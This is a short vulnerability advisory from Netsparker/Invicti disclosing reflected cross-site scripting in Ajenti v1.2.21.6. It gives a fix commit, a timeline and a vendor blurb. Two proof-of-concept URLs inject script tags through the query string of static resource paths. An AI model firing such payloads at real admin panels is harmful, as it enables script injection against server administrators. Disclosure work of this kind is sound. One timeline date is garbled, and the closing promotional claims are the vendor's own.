XSS Vulnerabilities in Ajenti
Information
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerabilities in Ajenti
Software: Ajenti v1.2.21.6 and possibly below.
Vendor Homepage: http://ajenti.org/
Vulnerability Type: Cross-site Scripting
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-020
Description
Ajenti – Web-based Linux server administration panel.
Details
Ajenti is affected by XSS vulnerabilities in version v1.2.21.6.
Example PoC urls are as follows:
- Cross-site Scripting
https://example:8000/ajenti:static/resources.js'"--></style></scRipt><scRipt>alert(0x000085)</scRipt>
(Querystring)https://example:8000/ajenti:static/resources.css'"--></style></scRipt><scRipt>alert(0x000091)</scRipt>
(Querystring)
Learn more about Cross-site Scripting vulnerabilities:
Solution
https://github.com/Eugeny/ajenti/commit/d3fc5eb142ff16d55d158afb050af18d5ff09120
Advisory Timeline
08/04/2014 – First Contact
0807/06/2014 – First Contact
08/06/2014 – Second Contact
08/06/2014 – Vulnerability fixed
09/06/2014 – Advisory released
Credits
It has been discovered on testing of Invicti Web Application Security Scanner.
About Invicti
Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on. Invicti’s unique detection and exploitation techniques allows it to be dead accurate in reporting hence it’s the first and the only False Positive Free web application security scanner.